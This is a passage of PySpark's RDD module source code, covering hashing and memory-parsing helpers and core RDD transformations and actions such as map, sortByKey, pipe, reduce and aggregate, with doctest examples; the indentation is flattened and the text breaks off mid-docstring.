UTF8Deserializer, pack_long, read_int, write_int
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _create_local_socket(sock_info):
(sockfile, sock) = local_connect_and_auth(*sock_info)
# The RDD materialization time is unpredictable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info, serializer):
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info, serializer):
class PyLocalIterable(object):
""" Create a synchronous local iterable over a socket """
def __init__(self, _sock_info, _serializer):
self._sockfile = _create_local_socket(_sock_info)
self._serializer = _serializer
self._read_iter = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self):
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, read error message and raise it
elif self._read_status == -1:
error_msg = UTF8Deserializer().loads(self._sockfile)
raise RuntimeError("An error occurred while reading the next element from "
"toLocalIterator: {}".format(error_msg))
def __del__(self):
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self, blocking=False):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
